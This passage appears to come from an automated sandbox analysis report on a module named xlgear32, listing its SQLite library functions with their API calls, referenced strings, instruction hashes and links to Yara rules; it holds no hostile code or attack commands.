                                                                          APIs
                                                                          • sqlite3_prepare_v2.SQLITE3 ref: 609615BA
                                                                          • sqlite3_step.SQLITE3 ref: 609615C9
                                                                          • sqlite3_column_int.SQLITE3 ref: 609615E1
                                                                            • Part of subcall function 6091D4F4: sqlite3_value_int.SQLITE3 ref: 6091D50C
                                                                          • sqlite3_finalize.SQLITE3 ref: 609615EE
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_column_intsqlite3_finalizesqlite3_prepare_v2sqlite3_stepsqlite3_value_int
                                                                          • String ID:
                                                                          • API String ID: 4265739436-0
                                                                          • Opcode ID: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                          • Instruction ID: 970f7a8085286b868af170b9ae73916577c28f03d50975cfa6e3c5bd991c66ad
                                                                          • Opcode Fuzzy Hash: edb1a347b7ee41d63e69a54b369763b34702b79c0c254a7699785c0090147395
                                                                          • Instruction Fuzzy Hash: BE01E4B0D083049BEB10EF69C58575EFBF9EFA5314F00896DE8A997380E775D9408B82
                                                                          Function 6092A62C Relevance: 6.0, APIs: 4, Instructions: 38stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_initialize.SQLITE3 ref: 6092A638
                                                                            • Part of subcall function 60912453: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5,?), ref: 609124D1
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 6092A64F
                                                                          • strcmp.MSVCRT ref: 6092A66A
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6092A67D
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_enter$sqlite3_initializesqlite3_mutex_leavestrcmp
                                                                          • String ID:
                                                                          • API String ID: 1894734062-0
                                                                          • Opcode ID: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                          • Instruction ID: 0dacd04717b96a229033e5bf385d74358d6efc238696297f04088f4a0acd15ee
                                                                          • Opcode Fuzzy Hash: 1480f87154849f1cdf239baa72c9ff1b5e3c835899009c68b4affe8256d9fce5
                                                                          • Instruction Fuzzy Hash: EBF0B4726243044BC7006F799CC164A7FAEEEB1298B05802CEC548B319EB35DC0297A1
                                                                          Function 609084D1 Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 609084E9
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 60908518
                                                                          • sqlite3_mutex_enter.SQLITE3 ref: 60908528
                                                                          • sqlite3_mutex_leave.SQLITE3 ref: 6090855B
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID:
                                                                          • API String ID: 1477753154-0
                                                                          • Opcode ID: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                          • Instruction ID: c41a4d3f3efa942db11cbd34a9101edfe28f26dd6f673ba1da0d5803e4a0adbd
                                                                          • Opcode Fuzzy Hash: dbb0a767127359d75753d9f151f7b9e03affe710ab86404e29d94d971225fba8
                                                                          • Instruction Fuzzy Hash: FD01A4B05093048BDB40AF25C5D97CABBA5EF15718F0884BDEC894F34AD7B9D5448BA1
                                                                          Function 609481BF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: into$out of
                                                                          • API String ID: 632333372-1114767565
                                                                          • Opcode ID: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                          • Instruction ID: de20b162988cb891a2f8fbcf22309076e3e21d241eadb06c465d82de9f0e8d92
                                                                          • Opcode Fuzzy Hash: 05e60a680804dc8d75cc30d301a58b6784d3cbcabfb13c7dcba40214300a3b29
                                                                          • Instruction Fuzzy Hash: 91910170A043149BDB26CF28C88175EBBBABF65308F0481E9E858AB355D7B5DE85CF41
                                                                          Function 60919123 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 60918408: sqlite3_value_text.SQLITE3 ref: 60918426
                                                                          • sqlite3_free.SQLITE3 ref: 609193A3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_freesqlite3_value_text
                                                                          • String ID: (NULL)$NULL
                                                                          • API String ID: 2175239460-873412390
                                                                          • Opcode ID: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                          • Instruction ID: 63658e955800b40111a930d2026d12727b3b294c4be858d68b3f7c51d7abf176
                                                                          • Opcode Fuzzy Hash: 2d639d8f8789be8f4f2115c7e339461789bfa1512606a4b94e85873a15b94a2d
                                                                          • Instruction Fuzzy Hash: E3514B31F0825A8EEB258A68C89479DBBB6BF66304F1441E9C4A9AB241D7309DC6CF01
                                                                          Function 60942334 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: string or blob too big$|
                                                                          • API String ID: 632333372-330586046
                                                                          • Opcode ID: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                          • Instruction ID: 65a9847582dc10a4f4f17f1c4fc8d82f10366072c52f03016cacc5a11d353e3e
                                                                          • Opcode Fuzzy Hash: b6301cf988e6664baaa8b4960c9a349f418ad1f33ca54faa928bbeacb0d503e6
                                                                          • Instruction Fuzzy Hash: 4D51B9749083689BCB22CF28C985789BBF6BF59314F1086D9E49897351C775EE81CF41
                                                                          Function 609426B3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: d$|
                                                                          • API String ID: 632333372-415524447
                                                                          • Opcode ID: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                          • Instruction ID: dac03e427e93f591f5d1737f90c886445feec93ea56e6f6f32424ebbe55d5cce
                                                                          • Opcode Fuzzy Hash: b41da94c8e0873fb31ce46b9bf1ec845f2d469f37e36bd2a55cc8f8885e561b5
                                                                          • Instruction Fuzzy Hash: 50510970A04329DBDB26CF19C981799BBBABF55308F0481D9E958AB341D735EE81CF41
                                                                          Function 609494A9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 110COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: -- $d
                                                                          • API String ID: 632333372-777087308
                                                                          • Opcode ID: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                          • Instruction ID: 827f605eab188c5b26b82399601ab0ab65c2dc521f736992582695f4996adf34
                                                                          • Opcode Fuzzy Hash: 04c39e600f9b005651fcb68da317ac4a80b79d2e803021aaf364a84fff9736a0
                                                                          • Instruction Fuzzy Hash: 5651F674A042689FDB26CF28C885789BBFABF55304F1081D9E99CAB341C7759E85CF41
                                                                          Function 609480BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_logsqlite3_value_text
                                                                          • String ID: string or blob too big
                                                                          • API String ID: 2320820228-2803948771
                                                                          • Opcode ID: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                          • Instruction ID: 1f8da1134a73d261049fdcd83983d84c916c8a3f87851362e697cdb17b1d2bab
                                                                          • Opcode Fuzzy Hash: 4552165c49a92a3f1eebbde7746405f837ee0ef0562a3825501d2540ddfe4a5c
                                                                          • Instruction Fuzzy Hash: F631D9B0A083249BCB25DF28C881799B7FABF69304F0085DAE898A7301D775DE81CF45
                                                                          Function 6091407D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                          • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                          • String ID:
                                                                          • API String ID: 3265351223-3916222277
                                                                          • Opcode ID: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                          • Instruction ID: a3c0f903ff645dd1c5a8146eaa2078e963ad6c1b8d1bbf61d5d4caeb1888773d
                                                                          • Opcode Fuzzy Hash: 46809e466d9dc696839b8d734d1d71a7cd961db8d22299a3a9f395bc6b436a6c
                                                                          • Instruction Fuzzy Hash: 19119EB0A0C6589BDF059F69C4D539A7BF6AF39308F0044E8D8D08B205E771CD94CB81
                                                                          Function 60956040 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_stricmp
                                                                          • String ID: log
                                                                          • API String ID: 912767213-2403297477
                                                                          • Opcode ID: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                          • Instruction ID: cbf508da25866b0a35bc2ca480d64d7c482f0664b0359b741109bd545b4f9ff5
                                                                          • Opcode Fuzzy Hash: 32625358f7d37366d1c1d188942de81712d107425b8b720a67b4b84d1adec0cd
                                                                          • Instruction Fuzzy Hash: FD11DAB07087048BE725AF66C49535EBBB3ABA1708F10C42CE4854B784C7BAC986DB42
                                                                          Function 60902148 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_strnicmp
                                                                          • String ID: SQLITE_
                                                                          • API String ID: 1961171630-787686576
                                                                          • Opcode ID: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                          • Instruction ID: 6d5ef3c0fd507030b5e8170497320435726bf3f0db30f2d6f2734bcd7f756fb3
                                                                          • Opcode Fuzzy Hash: 6b56a851e7df47422a7a29131339b4dfcb3302745a705f9abe90012807219487
                                                                          • Instruction Fuzzy Hash: 2501D6B190C3505FD7419F29CC8075BBFFAEBA5258F10486DE89687212D374DC81D781
                                                                          Function 6091A1B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                          • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                          Strings
                                                                          • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                          • String ID: Invalid argument to rtreedepth()
                                                                          • API String ID: 1063208240-2843521569
                                                                          • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                          • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                          • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                          • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                          Function 609561A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                            • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                            • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                            • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                            • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                          • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                          • String ID: soft_heap_limit
                                                                          • API String ID: 1251656441-405162809
                                                                          • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                          • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                          • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                          • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                          Function 60925208 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                          • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: sqlite3_log
                                                                          • String ID: NULL
                                                                          • API String ID: 632333372-324932091
                                                                          • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                          • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                          • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                          • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                          Function 6096D5A0 Relevance: 5.0, APIs: 4, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.2937873107.0000000060901000.00000020.00000001.01000000.00000009.sdmp, Offset: 60900000, based on PE: true
                                                                          • Associated: 00000004.00000002.2937858458.0000000060900000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938017940.000000006096E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938039416.000000006096F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938065505.000000006097B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938084359.000000006097D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000004.00000002.2938103007.0000000060980000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_60900000_xlgear32.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeavefree
                                                                          • String ID:
                                                                          • API String ID: 4020351045-0
                                                                          • Opcode ID: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
                                                                          • Instruction ID: 980a39aab3b848caec2c27f45d5308e77b440585e3cd6ccd446b63c63d51e1b6
                                                                          • Opcode Fuzzy Hash: 13d179c58506242de641c1793229aaf6d73ae3266bd26a3d41fb94aeb54caf06
